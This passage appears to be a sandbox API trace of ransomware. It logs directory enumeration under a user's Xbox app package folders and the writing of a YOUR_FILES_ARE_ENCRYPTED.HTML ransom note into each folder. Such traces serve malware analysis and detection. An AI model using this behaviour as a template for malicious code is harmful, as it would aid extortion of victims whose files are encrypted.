lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.880] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.880] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.880] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.880] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0120.880] GetProcessHeap () returned 0x600000 [0120.880] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.881] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.882] CloseHandle (hObject=0x324) returned 1 [0120.882] GetProcessHeap () returned 0x600000 [0120.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.882] GetProcessHeap () returned 0x600000 [0120.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.882] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.882] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.882] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory") returned 106 [0120.882] GetProcessHeap () returned 0x600000 [0120.882] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.882] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory" [0120.882] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\*" [0120.882] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.882] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.882] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.882] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.882] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0120.883] GetProcessHeap () returned 0x600000 [0120.883] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.883] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.884] CloseHandle (hObject=0x324) returned 1 [0120.884] GetProcessHeap () returned 0x600000 [0120.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.884] GetProcessHeap () returned 0x600000 [0120.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.884] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.884] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.884] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp") returned 99 [0120.884] GetProcessHeap () returned 0x600000 [0120.884] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.884] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp" [0120.885] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\*" [0120.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.885] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.885] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.885] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.885] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.885] GetProcessHeap () returned 0x600000 [0120.885] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.886] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.886] CloseHandle (hObject=0x324) returned 1 [0120.887] GetProcessHeap () returned 0x600000 [0120.887] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.887] GetProcessHeap () returned 0x600000 [0120.887] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.887] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.887] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.887] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0120.887] GetProcessHeap () returned 0x600000 [0120.887] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.888] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.889] CloseHandle (hObject=0x320) returned 1 [0120.889] GetProcessHeap () returned 0x600000 [0120.889] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.889] GetProcessHeap () returned 0x600000 [0120.889] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.890] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.890] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.890] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData") returned 99 [0120.890] GetProcessHeap () returned 0x600000 [0120.890] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.891] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData" [0120.891] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\*" [0120.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.891] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.891] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.891] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.892] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.892] GetProcessHeap () returned 0x600000 [0120.892] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.892] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.893] CloseHandle (hObject=0x320) returned 1 [0120.894] GetProcessHeap () returned 0x600000 [0120.894] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.894] GetProcessHeap () returned 0x600000 [0120.894] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.894] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be0462f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be0462f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be0462f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.894] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.894] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache") returned 102 [0120.894] GetProcessHeap () returned 0x600000 [0120.894] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.895] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache" [0120.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\*" [0120.895] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be0462f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be0462f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be0462f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.895] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be0462f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be0462f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be0462f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.895] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be0462f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be0462f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be0462f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.895] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.895] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 